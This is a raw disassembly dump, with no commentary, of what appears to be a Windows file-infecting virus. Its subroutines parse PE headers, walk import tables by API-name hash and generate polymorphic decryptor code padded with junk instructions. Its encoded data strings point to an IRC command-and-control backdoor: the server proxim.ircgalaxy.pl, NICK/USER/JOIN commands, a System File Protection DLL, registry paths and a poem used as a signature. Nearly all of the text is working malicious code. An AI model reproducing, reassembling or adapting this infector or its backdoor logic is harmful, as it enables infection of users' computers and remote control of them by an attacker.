958D0010h dd 101B97h, 54C93350h, 51525051h, 7E95FF51h, 8700103Eh dd 95FF2404h, 103E52h, 8D80C3F8h, 10156Fh, 6AC3F901h, 0FF016A01h dd 473FF33h, 0C08515FFh, 0DB335A74h, 0BB3D08Bh, 8D3C5003h dd 101DBBB5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C7832EEBh, 0CC8B530Fh dd 50D48B57h, 51406A54h, 0FFFF6A52h, 103F1295h, 868D8B00h dd 8300103Eh, 0CF2B0CC4h, 0C707E983h, 0E8006A07h, 34F8900h dd 464F53C3h, 52415754h, 694D5C45h, 736F7263h, 5C74666Fh dd 646E6957h, 5C73776Fh, 72727543h, 56746E65h, 69737265h dd 455C6E6Fh, 6F6C7078h, 726572h, 67726154h, 6F487465h dd 2007473h, 55500000h, 703C8972h, 69786F72h, 72692E6Dh dd 6C616763h, 2E797861h, 4E006C70h, 204B4349h, 62627075h dd 6F616D63h, 4553550Ah, 4A792052h, 204E494Fh, 72697626h dd 550A7574h, 0E8h, 0ED815D00h, 101EA5h, 156F85C6h, 0FF000010h dd 103EAA95h, 1FE8C100h, 1E6A3C74h, 3E62B58Bh, 0AC590010h dd 2A752E3Ch, 0FF3E8166h, 8D23751Dh, 103F66BDh, 2768B00h dd 0A566A557h, 38DC858Dh, 858F0010h, 103902h, 0FA4689FAh dd 0FBFE4E8Ch, 0CFE201B1h, 21E850EBh, 83FFFFFBh, 408247Ch dd 8E84475h, 53000000h, 442E4346h, 0FF004C4Ch, 103EB695h dd 74C00B00h, 26A930Dh, 5E95FF53h, 0FF00103Eh, 97E893D0h dd 0E8FFFFFEh, 0Bh, 5F434653h, 442E534Fh, 0FF004C4Ch, 103EB695h dd 0FE7CE800h, 0E8FFFFh, 0FFFFFFF6h, 1012D48Dh, 8DC93300h dd 10431485h, 51515100h, 51515051h, 0B295FF51h, 0E800103Eh dd 0Bh, 52455355h, 442E3233h, 0FF004C4Ch, 103EB695h, 0AE800h dd 73770000h, 6E697270h, 416674h, 5E95FF50h, 8900103Eh dd 103E6685h, 8D310F00h, 1019758Dh, 6C858900h, 5100103Fh dd 3EB695FFh, 68930010h, 4, 1982B58Dh, 8D590010h, 103F52BDh dd 0F5C2E800h, 0C766FFFFh, 101E6585h, 83500000h, 101E67A5h dd 958D0000h, 101E25h, 16A5450h, 6852006Ah, 80000002h dd 3F5695FFh, 0C0850010h, 8D22755Ah, 101E588Dh, 66A5200h dd 1E65B58Dh, 56540010h, 52515050h, 3F5A95FFh, 0FF580010h dd 103F5295h, 7385C600h, 1041h, 0CE8h, 4F535700h, 32334B43h dd 4C4C442Eh, 0B695FF00h, 9300103Eh, 768h, 0D9B58D00h dd 59001018h, 3F22BD8Dh, 3DE80010h, 0E8FFFFF5h, 0Ch, 494E4957h dd 2E54454Eh, 4C4C44h, 3EB695FFh, 0C0850010h, 235840Fh dd 68930000h, 5, 1917B58Dh, 8D590010h, 103F3EBDh, 0F506E800h dd 0BD83FFFFh, 103F42h, 10840F00h, 81000002h, 190ECh, 1685400h dd 0FF000001h, 103F2295h, 90C48100h, 50000001h, 6AD48Bh dd 4295FF52h, 8500103Fh, 0D7559C0h, 138868h, 0D695FF00h dd 0EB00103Eh, 67BD83E2h, 101Eh, 858D2975h, 101E6Bh, 2E95FF50h dd 8500103Fh, 89840FC0h, 8B000001h, 8B0C40h, 858F30FFh dd 101E67h, 417385C6h, 6A010010h, 6A016A00h, 3A95FF02h dd 8300103Fh, 840FFFF8h, 160h, 63958D93h, 6A00101Eh, 0FF535210h dd 103F2A95h, 0FC08500h, 14085h, 84BD8D00h, 0B100101Eh dd 0FA3CE808h, 9468FFFFh, 5E000000h, 3489E62Bh, 95FF5424h dd 103EAEh, 1E92BD8Dh, 1B10010h, 0FFFA1DE8h, 7F958DFFh dd 6A00101Eh, 146800h, 53520000h, 3F3695FFh, 448D0010h dd 958D1424h, 104314h, 0AB60F50h, 1424448Bh, 208E0C1h dd 4A12014Ah, 34A1202h, 824440Bh, 0C10FE180h, 0B5108E0h dd 0FF102444h, 0BD8D5032h, 103F74h, 1CE8h, 362E2500h, 202E2078h dd 253A202Eh, 382E2525h, 20782578h, 4A0A7325h, 204E494Fh dd 95FF5700h, 103E66h, 0ACC481h, 6A0000h, 0FF535750h, 103F3695h dd 888D8B00h, 6A001015h, 6B1BE300h, 0E8510DC9h, 5, 0A642526h dd 95FF5700h, 103E66h, 500CC483h, 7680BEBh, 8D000000h dd 101E98BDh, 0FF535700h, 103F3695h, 7EC08500h, 74B58D54h dd 8300103Fh, 101588A5h, 8D8D0000h, 104173h, 6ACE2Bh, 0FF535651h dd 103F3295h, 0F88300h, 8B912F7Eh, 74B58DFEh, 0B000103Fh dd 75AEF20Dh, 2AE86010h, 61FFFFFAh, 9E31772h, 0EB01778Dh dd 2BCF8BEAh, 74BD8DCEh, 0F300103Fh, 0EBF787A4h, 95FF53B9h dd 103F26h, 156FBD80h, 74010010h, 7530682Ah, 95FF0000h dd 103ED6h, 4173BD80h, 74000010h, 6785C711h, 101Eh, 0C6000000h dd 10417385h, 8E90000h, 0C7FFFFFEh, 10157885h, 0 dd 4C25D80h, 4F0A0D00h, 6F6F6E20h, 666F206Eh, 66696C20h dd 4F202165h, 6D697420h, 6F742065h, 6C656320h, 61726265h dd 0D216574h, 2020200Ah, 204F2020h, 6D6D7573h, 67207265h dd 65647261h, 0A0D216Eh, 656C6552h, 656C746Eh, 796C7373h dd 70616820h, 61207970h, 6520646Eh, 63657078h, 746E6174h dd 7473202Ch, 69646E61h, 203A676Eh, 570A0D2Dh, 68637461h dd 20676E69h, 206C6C61h, 20796164h, 20646E61h, 6867696Eh dd 66202C74h, 6620726Fh, 6E656972h, 49207364h, 69617720h dd 0A0D3A74h, 72656857h, 72612065h, 6F792065h, 66202C75h dd 6E656972h, 203F7364h, 656D6F43h, 74492021h, 20736920h dd 656D6974h, 74492021h, 6C207327h, 21657461h, 4CA2A1A8h dd 6299AD47h, 10A61429h, 0C26CCC5Ch, 606EF96Ah, 1Bh dup(0) ; =============== S U B R O U T I N E ======================================= sub_31432404 proc near ; CODE XREF: sub_314324BA:loc_314324A8p ; sub_3143250B+7p ... arg_0 = dword ptr 4 pusha and dword ptr [ebp+1042E4h], 0 and dword ptr [ebp+1042E8h], 0 movzx eax, word ptr [ebx+14h] lea edx, [ebx+18h] movzx ecx, word ptr [ebx+6] add edx, eax loc_31432420: ; CODE XREF: sub_31432404+41j mov eax, [esp+20h+arg_0] sub eax, [edx+0Ch] jb short loc_31432442 cmp eax, [edx+8] jnb short loc_31432442 mov eax, [edx+14h] sub eax, [edx+0Ch] mov [ebp+1042E4h], edx mov [ebp+1042E8h], eax jmp short loc_31432447 ; --------------------------------------------------------------------------- loc_31432442: ; CODE XREF: sub_31432404+23j ; sub_31432404+28j add edx, 28h loop loc_31432420 loc_31432447: ; CODE XREF: sub_31432404+3Cj popa retn 4 sub_31432404 endp ; --------------------------------------------------------------------------- mov [ebp+102457h], al call sub_314324BA push 1Fh lea eax, [ebp+102384h] pop ecx loc_31432462: ; CODE XREF: UPX2:31432469j cmp [eax], ebx jz short loc_31432472 add eax, 4 loop loc_31432462 inc dword ptr [ebp+1042C0h] retn ; --------------------------------------------------------------------------- loc_31432472: ; CODE XREF: UPX2:31432464j neg ecx add ecx, [ebp+102457h] jecxz short loc_3143248C loc_3143247C: ; CODE XREF: UPX2:31432484j push dword ptr [eax-4] pop dword ptr [eax] sub eax, 4 loop loc_3143247C mov [ebp+102384h], ebx ; START OF FUNCTION CHUNK FOR sub_314324BA loc_3143248C: ; CODE XREF: UPX2:3143247Aj ; sub_314324BA+34j cmp dword ptr [edx], 0 jz short loc_31432496 sub esi, [edx] add esi, [edx+10h] loc_31432496: ; CODE XREF: sub_314324BA-2Bj lea ecx, [esi-4] pop eax pop ebx pop esi cmp dword ptr [edx], 0 jz short loc_314324A5 push dword ptr [edx] jmp short loc_314324A8 ; --------------------------------------------------------------------------- loc_314324A5: ; CODE XREF: sub_314324BA-1Bj push dword ptr [edx+10h] loc_314324A8: ; CODE XREF: sub_314324BA-17j call sub_31432404 sub ecx, esi sub ecx, [ebp+1042E8h] pop eax add ecx, [ebx+34h] retn ; END OF FUNCTION CHUNK FOR sub_314324BA ; =============== S U B R O U T I N E ======================================= sub_314324BA proc near ; CODE XREF: UPX2:31432451p ; FUNCTION CHUNK AT 3143248C SIZE 0000002E BYTES pop dword ptr [ebp+1042C4h] mov dword ptr [ebp+1042C0h], 0 call sub_3143250B mov eax, [ebp+1042C0h] call near ptr dword_31431B40+43h call sub_314324F7 cmp dword ptr [ebp+1042C0h], 0 jnz short loc_314324F0 mov [ebp+102400h], ebx jmp short loc_3143248C ; --------------------------------------------------------------------------- loc_314324F0: ; CODE XREF: sub_314324BA+2Cj dec dword ptr [ebp+1042C0h] retn sub_314324BA endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_314324F7 proc near ; CODE XREF: sub_314324BA+20p pop dword ptr [ebp+1042C4h] mov [ebp+1042C0h], edx call sub_3143250B xor ecx, ecx retn sub_314324F7 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_3143250B proc near ; CODE XREF: sub_314324BA+10p ; sub_314324F7+Cp ... var_C = dword ptr -0Ch var_4 = dword ptr -4 mov edx, [ebx+80h] push edx call sub_31432404 add edx, [ebp+1042E8h] add edx, esi loc_3143251F: ; CODE XREF: sub_3143250B+120j cmp dword ptr [edx+0Ch], 0 jz locret_31432630 cmp dword ptr [edx+10h], 0 jz locret_31432630 mov eax, [edx+0Ch] push eax call sub_31432404 add eax, [ebp+1042E8h] add eax, esi push eax loc_31432545: ; CODE XREF: sub_3143250B+47j mov cl, [eax] cmp cl, 0 jz short loc_31432565 cmp cl, 2Eh jz short loc_31432554 loc_31432551: ; CODE XREF: sub_3143250B+58j inc eax jmp short loc_31432545 ; --------------------------------------------------------------------------- loc_31432554: ; CODE XREF: sub_3143250B+44j mov ecx, [eax+1] and ecx, 0DFDFDFDFh cmp ecx, 4C4C44h jnz short loc_31432551 loc_31432565: ; CODE XREF: sub_3143250B+3Fj pop ecx sub ecx, eax cmp ecx, 0FFFFFFFAh jg loc_31432628 cmp word ptr [eax-2], 3233h jnz loc_31432628 push esi cmp dword ptr [edx], 0 jnz short loc_31432588 mov ecx, [edx+10h] jmp short loc_3143258A ; --------------------------------------------------------------------------- loc_31432588: ; CODE XREF: sub_3143250B+76j mov ecx, [edx] loc_3143258A: ; CODE XREF: sub_3143250B+7Bj add esi, ecx push ecx call sub_31432404 add esi, [ebp+1042E8h] loc_31432598: ; CODE XREF: sub_3143250B+90j ; sub_3143250B+117j lodsd test eax, eax js short loc_31432598 jz loc_31432627 push dword ptr [ebp+1042E8h] push eax call sub_31432404 add eax, [ebp+1042E8h] pop dword ptr [ebp+1042E8h] add eax, [esp+4+var_4] push ebx add eax, 2 xor ebx, ebx loc_314325C4: ; CODE XREF: sub_3143250B+CEj movzx ecx, byte ptr [eax] jecxz short loc_314325DB or cl, 20h push ebx shl [esp+0Ch+var_C], 4 sub [esp+0Ch+var_C], ebx sub [esp+0Ch+var_C], ecx pop ebx inc eax jmp short loc_314325C4 ; --------------------------------------------------------------------------- loc_314325DB: ; CODE XREF: sub_3143250B+BCj cmp ebx, 0DDBBD70Fh jz short loc_31432621 cmp ebx, 0DB6E45A8h jz short loc_31432621 cmp ebx, 0FFA13B59h jz short loc_31432621 cmp ebx, 0ACB522D6h jz short loc_31432621 cmp ebx, 0F358E993h jz short loc_31432621 cmp ebx, 0F358E97Dh jz short loc_31432621 cmp ebx, 0E1253F46h jz short loc_31432621 cmp ebx, 0E1253F30h jz short loc_31432621 call dword ptr [ebp+1042C4h] loc_31432621: ; CODE XREF: sub_3143250B+D6j ; sub_3143250B+DEj ... pop ebx jmp loc_31432598 ; --------------------------------------------------------------------------- loc_31432627: ; CODE XREF: sub_3143250B+92j pop esi loc_31432628: ; CODE XREF: sub_3143250B+60j ; sub_3143250B+6Cj add edx, 14h jmp loc_3143251F ; --------------------------------------------------------------------------- locret_31432630: ; CODE XREF: sub_3143250B+18j ; sub_3143250B+22j retn sub_3143250B endp ; --------------------------------------------------------------------------- align 2 dw 46Ah dd 0F549E858h, 9588FFFFh, 102631h, 1831B866h, 0E4C0E202h dd 66E20203h, 58066AABh, 0FFF52EE8h, 8C283FFh, 56AD187h dd 0F521E858h, 0FA80FFFFh, 0B00B7303h, 31850250h, 0AA001026h dd 686A27EBh, 0FA80AA58h, 0B0187503h, 0F501E811h, 1B8FFFFh dd 84000000h, 0D10D74D2h, 0EBCAFEE0h, 0B805EBF6h, 80000000h dd 0C3BFE2ABh, 39BC958Dh, 0D72B0010h, 0F7C3DAF7h, 1039B085h dd 0 ; --------------------------------------------------------------------------- adc [edi], cl xchg eax, ebp rol cl, 0E0h or esi, esi test [esi+1001039h], ebp jnz short loc_314326C6 or ax, 2589h jmp short loc_314326D9 ; --------------------------------------------------------------------------- loc_314326C6: ; CODE XREF: UPX2:314326BEj test byte ptr [ebp+1039AEh], 2 jnz short loc_314326D5 or ax, 2531h jmp short loc_314326D9 ; --------------------------------------------------------------------------- loc_314326D5: ; CODE XREF: UPX2:314326CDj or ax, 2501h loc_314326D9: ; CODE XREF: UPX2:314326C4j ; UPX2:314326D3j stosw call near ptr dword_31432634+68h mov eax, [ebx+34h] mov [ebp+1042D8h], edx stosd retn ; =============== S U B R O U T I N E ======================================= sub_314326EB proc near ; CODE XREF: UPX2:31432D37p test dword ptr [ebp+1039B0h], 10000000h setnz al add al, 0BCh stosb call near ptr dword_31432634+68h mov [ebp+1042DCh], edx test byte ptr [ebp+1039AEh], 1 jnz short loc_31432713 rdtsc jmp short loc_31432715 ; --------------------------------------------------------------------------- loc_31432713: ; CODE XREF: sub_314326EB+22j sub eax, eax loc_31432715: ; CODE XREF: sub_314326EB+26j stosd retn sub_314326EB endp ; =============== S U B R O U T I N E ======================================= sub_31432717 proc near ; CODE XREF: UPX2:loc_31432D41p test dword ptr [ebp+1039B0h], 10000000h jz short loc_3143274A mov al, [ebp+1039AAh] shl eax, 0Bh or ax, 458Bh stosw mov al, 0F8h stosb mov al, [ebp+1039AAh] shl eax, 1Bh add eax, 6896467h stosd xor eax, eax stosw jmp short locret_3143275C ; --------------------------------------------------------------------------- loc_3143274A: ; CODE XREF: sub_31432717+Aj mov eax, 58F64h stosd mov al, [ebp+1039AAh] add al, 58h shl eax, 18h stosd locret_3143275C: ; CODE XREF: sub_31432717+31j retn sub_31432717 endp ; =============== S U B R O U T I N E ======================================= sub_3143275D proc near ; CODE XREF: sub_314327CF:loc_314327F6p ; sub_314327CF+4Cp ... mov byte ptr [ebp+10278Ch], 9 jmp short loc_3143278B ; --------------------------------------------------------------------------- loc_31432766: ; CODE XREF: sub_3143275D+44j mov al, 0FCh jmp short loc_3143278A ; --------------------------------------------------------------------------- loc_3143276A: ; CODE XREF: sub_3143275D+48j mov ax, 0EBh stosw jmp short loc_3143278B ; --------------------------------------------------------------------------- loc_31432772: ; CODE XREF: sub_3143275D+4Cj push 4 pop eax call near ptr dword_31431B40+43h lea eax, [edx+edx*8] shl eax, 8 add ax, 0C089h stosw jmp short loc_3143278B ; --------------------------------------------------------------------------- loc_31432788: ; CODE XREF: sub_3143275D+50j mov al, 90h loc_3143278A: ; CODE XREF: sub_3143275D+Bj ; sub_3143275D+60j ... stosb loc_3143278B: ; CODE XREF: sub_3143275D+7j ; sub_3143275D+13j ... push 1Bh pop eax call near ptr dword_31431B40+43h add byte ptr [ebp+10278Ch], 6 cmp dl, 8 jnb short locret_314327CE test dl, dl jz short loc_31432766 dec dl jz short loc_3143276A dec dl jz short loc_31432772 dec dl jz short loc_31432788 dec dl jz short loc_314327BF dec dl jz short loc_314327C6 dec dl jz short loc_314327CA mov al, 0F9h jmp short loc_3143278A ; --------------------------------------------------------------------------- loc_314327BF: ; CODE XREF: sub_3143275D+54j mov al, 87h stosb mov al, 0DBh jmp short loc_3143278A ; --------------------------------------------------------------------------- loc_314327C6: ; CODE XREF: sub_3143275D+58j mov al, 0F5h jmp short loc_3143278A ; --------------------------------------------------------------------------- loc_314327CA: ; CODE XREF: sub_3143275D+5Cj mov al, 0F8h jmp short loc_3143278A ; --------------------------------------------------------------------------- locret_314327CE: ; CODE XREF: sub_3143275D+40j retn sub_3143275D endp ; =============== S U B R O U T I N E ======================================= sub_314327CF proc near ; CODE XREF: UPX2:loc_31432C18p ; UPX2:31432DCBp test dword ptr [ebp+1039B0h], 2000h mov al, 86h jnz short loc_314327DF add al, 4 loc_314327DF: ; CODE XREF: sub_314327CF+Cj lea ecx, [edi-2] mov ah, [ebp+1039A8h] stosw cmp ah, 5 jnz short loc_314327F6 mov al, 0 or byte ptr [edi-1], 40h stosb loc_314327F6: ; CODE XREF: sub_314327CF+1Ej call sub_3143275D test dword ptr [ebp+1039B0h], 4000h mov ax, 3166h jnz short loc_3143280D mov ah, 29h loc_3143280D: ; CODE XREF: sub_314327CF+3Aj stosw mov al, 18h or al, [ebp+1039AAh] shl al, 3 stosb call sub_3143275D mov al, 88h test dword ptr [ebp+1039B0h], 8000h jnz short loc_31432830 mov al, 86h loc_31432830: ; CODE XREF: sub_314327CF+5Dj mov ah, [ebp+1039A8h] stosw cmp ah, 5 jnz short locret_31432844 mov al, 0 or byte ptr [edi-1], 40h stosb locret_31432844: ; CODE XREF: sub_314327CF+6Cj retn sub_314327CF endp ; --------------------------------------------------------------------------- loc_31432845: ; CODE XREF: sub_3143344B+183p lea edi, [ebp+1039BCh] call sub_3143275D test dword ptr [ebp+1039B0h], 400000h jz short near ptr unk_3143285F mov al, 60h stosb ; --------------------------------------------------------------------------- unk_3143285F db 0F7h ; ; CODE XREF: UPX2:3143285Aj db 85h ; db 0B0h ; db 39h ; 9 db 10h db 0 db 0 db 0 db 0 ; --------------------------------------------------------------------------- adc [edi+eax-48h], dh push ebp mov ebp, esp add [ebx-4F7A08B1h], ch cmp [eax], edx add [ebx], al ; --------------------------------------------------------------------------- db 2 dup(0), 2 dd 0F0840Fh, 0E8B00000h, 0BD89ABAAh, 1042C8h, 0FFFECCE8h dd 0AAE8B0FFh, 0CCBD89ABh, 0E8001042h, 0FFFFFEBDh, 39B085F7h dd 30010h, 1A740000h, 39B085F7h, 10h, 0A740200h, 0FFFE2EE8h dd 0FE9BE8FFh, 0E9B0FFFFh, 858BABAAh, 1042C8h, 0C82BCF8Bh dd 42D0BD89h, 48890010h, 6467B8FCh, 33AB36FFh, 0F7AB66C0h dd 1039B085h, 300h, 0F6137400h, 1039AE85h, 0A748000h, 0FFFDAAE8h dd 0FE5BE8FFh, 67B8FFFFh, 0AB268964h, 0AB66C033h, 39B085F7h dd 30010h, 5A740000h, 39AE85F6h, 75800010h, 0FD81E80Ah dd 32E8FFFFh, 0E8FFFFFEh, 0FFFFFD02h, 14E820B0h, 0E3FFFFFBh dd 0FFB86639h, 91AB6615h, 0B0958BABh, 0F7001039h, 3C2F7D2h dd 75000000h, 0FCDCE814h, 1FB0FFFFh, 0FFFAEEE8h, 0FFB866FFh dd 91AB6615h, 8BCF8BABh, 1042D085h, 89C82B00h, 85F7FC48h dd 1039B0h, 3, 85F73874h, 1039B0h, 0C000000h, 85F72C74h dd 1039B0h, 2000000h, 0C2E80A75h, 0E8FFFFFDh, 0FFFFFD4Bh dd 39B085F7h, 10h, 0A740800h, 0FFFDACE8h, 0FD61E8FFh, 85F7FFFFh dd 1039B0h, 4, 96E81774h, 0B8FFFFFDh, 0C8FEC029h, 0C008B8ABh dd 0B8AB0474h, 67EBF875h, 0FD7FE8ABh, 85F7FFFFh, 1039B0h dd 8, 0BD807275h, 1039AEh, 0E8697400h, 0FFFFFD65h, 291829B8h dd 0AAA50AC9h, 0C0001039h, 0A50A03E4h, 1039AAh, 0FD4BE8ABh dd 0B1B0FFFFh, 0AE858AAAh, 0AA001039h, 0FFFD3CE8h, 85B60FFFh dd 1039AAh, 4C0048Dh, 8E0C140h, 0AB668DB0h, 57AA01B0h dd 0FFFD20E8h, 243C29FFh, 0FBE2B866h, 0B085F759h, 10001039h dd 74000000h, 0AA49B007h, 0FA75B866h, 0AB66E102h, 0FFFCFCE8h dd 0AAE8B0FFh, 89ABC033h, 1042B4BDh, 0B085F700h, 20001039h dd 75000000h, 0DEE8573Bh, 0F7FFFFFCh, 1039B085h, 0 dd 89187480h, 1042E0BDh, 0FD39E800h, 0C2E8FFFFh, 0B0FFFFFCh dd 0BAE8AAC3h, 5AFFFFFCh, 58B0CF8Bh, 850ACA2Bh, 1039A8h dd 0AAFC4A89h, 0FFFCA4E8h, 81B866FFh, 0B085F7C0h, 40001039h dd 74000000h, 28C48003h, 39A8A50Ah, 0AB660010h, 42B8BD89h dd 0F7AB0010h, 1039B085h, 0 ; --------------------------------------------------------------------------- inc eax jnz short loc_31432AF0 mov al, 50h add al, [ebp+1039A8h] stosb loc_31432AF0: ; CODE XREF: UPX2:31432AE5j test dword ptr [ebp+1039B0h], 80h jnz short loc_31432B07 mov al, 0B8h or al, [ebp+1039A9h] stosb jmp short loc_31432B44 ; --------------------------------------------------------------------------- loc_31432B07: ; CODE XREF: UPX2:31432AFAj mov ax, 1831h test dword ptr [ebp+1039B0h], 100h jz short loc_31432B19 mov al, 29h loc_31432B19: ; CODE XREF: UPX2:31432B15j or ah, [ebp+1039A9h] shl ah, 3 or ah, [ebp+1039A9h] stosw mov ax, 0F081h test dword ptr [ebp+1039B0h], 200h jnz short loc_31432B3C mov ah, 0C8h loc_31432B3C: ; CODE XREF: UPX2:31432B38j or ah, [ebp+1039A9h] stosw loc_31432B44: ; CODE XREF: UPX2:31432B05j mov [ebp+1042D4h], edi mov eax, 29BCh stosd test dword ptr [ebp+1039B0h], 8 jz short loc_31432BCD call sub_3143275D test dword ptr [ebp+1039B0h], 400h jnz short loc_31432B78 mov al, 0B8h or al, [ebp+1039AAh] stosb jmp short loc_31432BC5 ; --------------------------------------------------------------------------- loc_31432B78: ; CODE XREF: UPX2:31432B6Bj test dword ptr [ebp+1039B0h], 800h jnz short loc_31432B95 mov ax, 0E083h or ah, [ebp+1039AAh] stosw xor eax, eax stosb jmp short loc_31432BAA ; --------------------------------------------------------------------------- loc_31432B95: ; CODE XREF: UPX2:31432B82j mov ax, 1829h or ah, [ebp+1039AAh] shl ah, 3 or ah, [ebp+1039AAh] stosw loc_31432BAA: ; CODE XREF: UPX2:31432B93j test dword ptr [ebp+1039B0h], 1000h mov ax, 0C081h jz short loc_31432BBD add ah, 8 loc_31432BBD: ; CODE XREF: UPX2:31432BB8j or ah, [ebp+1039AAh] stosw loc_31432BC5: ; CODE XREF: UPX2:31432B76j movzx eax, byte ptr [ebp+1039AEh] stosd loc_31432BCD: ; CODE XREF: UPX2:31432B5Aj call sub_3143275D test dword ptr [ebp+1039B0h], 40000000h jz short loc_31432BEC mov al, 50h add al, [ebp+1039A8h] stosb call sub_3143275D loc_31432BEC: ; CODE XREF: UPX2:31432BDCj lea ecx, [edi-2] mov [ebp+1042BCh], ecx test dword ptr [ebp+1039B0h], 80000000h jz short loc_31432C18 mov al, 0E8h stosb mov eax, [ebp+1042E0h] sub eax, edi sub eax, 4 stosd mov [ebp+1042E0h], edi jmp short loc_31432C1D ; --------------------------------------------------------------------------- loc_31432C18: ; CODE XREF: UPX2:31432BFFj call sub_314327CF loc_31432C1D: ; CODE XREF: UPX2:31432C16j call sub_3143275D test dword ptr [ebp+1039B0h], 10000h jnz short loc_31432C39 mov al, 40h or al, [ebp+1039A8h] stosb jmp short loc_31432C48 ; --------------------------------------------------------------------------- loc_31432C39: ; CODE XREF: UPX2:31432C2Cj mov ax, 0C083h or ah, [ebp+1039A8h] stosw mov al, 1 stosb loc_31432C48: ; CODE XREF: UPX2:31432C37j test dword ptr [ebp+1039B0h], 20000h jnz short loc_31432C83 test dword ptr [ebp+1039B0h], 40000h jnz short loc_31432C7A mov al, 0C0h or al, [ebp+1039AAh] mov ah, [ebp+1039AFh] shl eax, 10h mov ax, 8166h stosd mov al, 0 jmp short loc_31432C82 ; --------------------------------------------------------------------------- loc_31432C7A: ; CODE XREF: UPX2:31432C5Ej mov al, 40h or al, [ebp+1039AAh] loc_31432C82: ; CODE XREF: UPX2:31432C78j stosb loc_31432C83: ; CODE XREF: UPX2:31432C52j test dword ptr [ebp+1039B0h], 80000h jnz short loc_31432C9F mov ax, 0E883h or ah, [ebp+1039A9h] stosw mov al, 1 jmp short loc_31432CA7 ; --------------------------------------------------------------------------- loc_31432C9F: ; CODE XREF: UPX2:31432C8Dj mov al, 48h or al, [ebp+1039A9h] loc_31432CA7: ; CODE XREF: UPX2:31432C9Dj stosb call sub_3143275D test dword ptr [ebp+1039B0h], 100000h mov cl, 75h jnz short loc_31432CE0 mov ax, 0F883h or ah, [ebp+1039A9h] stosw xor eax, eax stosb sub [ebp+1042BCh], edi test dword ptr [ebp+1039B0h], 200000h jnz short loc_31432CFB mov cl, 77h jmp short loc_31432CFB ; --------------------------------------------------------------------------- loc_31432CE0: ; CODE XREF: UPX2:31432CB9j mov ax, 1809h or ah, [ebp+1039A9h] shl ah, 3 or ah, [ebp+1039A9h] stosw sub [ebp+1042BCh], edi loc_31432CFB: ; CODE XREF: UPX2:31432CDAj ; UPX2:31432CDEj mov al, cl mov ah, [ebp+1042BCh] stosw mov al, 58h add al, [ebp+1039A8h] stosb call sub_3143275D test dword ptr [ebp+1039B0h], 2000003h jz short loc_31432D4B test dword ptr [ebp+1039B0h], 8000000h jnz short loc_31432D4B test dword ptr [ebp+1039B0h], 6000000h jnz short loc_31432D41 call sub_314326EB call sub_3143275D loc_31432D41: ; CODE XREF: UPX2:31432D35j call sub_31432717 call sub_3143275D loc_31432D4B: ; CODE XREF: UPX2:31432D1Dj ; UPX2:31432D29j test dword ptr [ebp+1039B0h], 10000000h jz short loc_31432D5F mov al, 0C9h stosb call sub_3143275D loc_31432D5F: ; CODE XREF: UPX2:31432D55j test dword ptr [ebp+1039B0h], 400000h jz short loc_31432D95 mov al, 7 sub al, [ebp+1039A8h] shl eax, 1Ah or eax, 240889h add ah, [ebp+1039A8h] shl ah, 3 add ah, 4 stosd call sub_3143275D mov al, 61h stosb call sub_3143275D loc_31432D95: ; CODE XREF: UPX2:31432D69j mov ax, 0E0FFh or ah, [ebp+1039A8h] stosw call sub_3143275D test dword ptr [ebp+1039B0h], 20h jz short loc_31432E21 test dword ptr [ebp+1039B0h], 80000000h jz short loc_31432DDD mov eax, edi mov ecx, [ebp+1042E0h] sub eax, ecx mov [ecx-4], eax call sub_314327CF call sub_3143275D mov al, 0C3h stosb call sub_3143275D loc_31432DDD: ; CODE XREF: UPX2:31432DBCj mov eax, edi mov ecx, [ebp+1042B4h] sub eax, ecx mov [ecx-4], eax mov al, 58h or al, [ebp+1039A8h] stosb call sub_3143275D test dword ptr [ebp+1039B0h], 800000h jz short loc_31432E10 mov ax, 0C350h or al, [ebp+1039A8h] jmp short loc_31432E1A ; --------------------------------------------------------------------------- loc_31432E10: ; CODE XREF: UPX2:31432E02j mov ax, 0E0FFh or ah, [ebp+1039A8h] loc_31432E1A: ; CODE XREF: UPX2:31432E0Ej stosw call sub_3143275D loc_31432E21: ; CODE XREF: UPX2:31432DB0j test dword ptr [ebp+1039B0h], 2000003h jz short loc_31432E8C mov ecx, edi mov eax, [ebp+1042CCh] sub ecx, eax mov [eax-4], ecx xor ecx, ecx test dword ptr [ebp+1039B0h], 1000000h jnz short loc_31432E56 lea eax, [ebp+1039A8h] loc_31432E4E: ; CODE XREF: UPX2:31432E54j mov cl, [eax] inc eax cmp cl, 3 jnb short loc_31432E4E loc_31432E56: ; CODE XREF: UPX2:31432E46j lea eax, ds:102444h[ecx*8] shl eax, 8 mov al, 8Bh stosd jecxz short loc_31432E6B mov ax, 0C031h stosw loc_31432E6B: ; CODE XREF: UPX2:31432E63j mov ax, 808Fh push 0B8h add ah, cl stosw pop eax stosd test ecx, ecx jnz short loc_31432E84 mov ax, 0C031h stosw loc_31432E84: ; CODE XREF: UPX2:31432E7Cj mov al, 0C3h stosb call sub_3143275D loc_31432E8C: ; CODE XREF: UPX2:31432E2Bj lea eax, [ebp+1039BCh] test dword ptr [ebp+1039B0h], 20000000h jnz short loc_31432EA4 push edi sub edi, eax pop eax jmp short loc_31432EBD ; --------------------------------------------------------------------------- loc_31432EA4: ; CODE XREF: UPX2:31432E9Cj mov edx, [ebx+28h] sub edi, eax sub edx, eax mov ecx, [ebp+1042D4h] add [ebp+1042B4h], edx add [ecx], edi mov eax, [esp+4] loc_31432EBD: ; CODE XREF: UPX2:31432EA2j mov [ebp+101069h], edi mov edi, [ebp+1042B8h] sub eax, [ebp+1042B4h] test dword ptr [ebp+1039B0h], 40h jz short loc_31432EDD neg eax loc_31432EDD: ; CODE XREF: UPX2:31432ED9j stosd retn 4 ; =============== S U B R O U T I N E ======================================= sub_31432EE1 proc near ; CODE XREF: sub_3143344B+336p push esi push edi cmp dword ptr [ebp+1042F0h], 0 jz loc_314330C9 call near ptr loc_31432F01+1 dec ebx inc ebp push edx dec esi inc ebp dec esp xor esi, [edx] db 2Eh inc esp dec esp dec esp loc_31432F01: ; CODE XREF: sub_31432EE1+Fp add bh, bh sub_31432EE1 endp ; sp-analysis failed xchg eax, ebp sahf db 3Eh adc [eax], al mov [ebp+104304h], eax push ebx mov ebx, [eax+3Ch] add ebx, eax push dword ptr [ebx+28h] mov eax, [ebx+34h] call sub_31432404 mov edx, [ebp+1042E4h] pop ebx add eax, [edx+0Ch] mov [ebp+104308h], eax add eax, [edx+8] mov [ebp+10430Ch], eax mov esi, [ebx+28h] push dword ptr 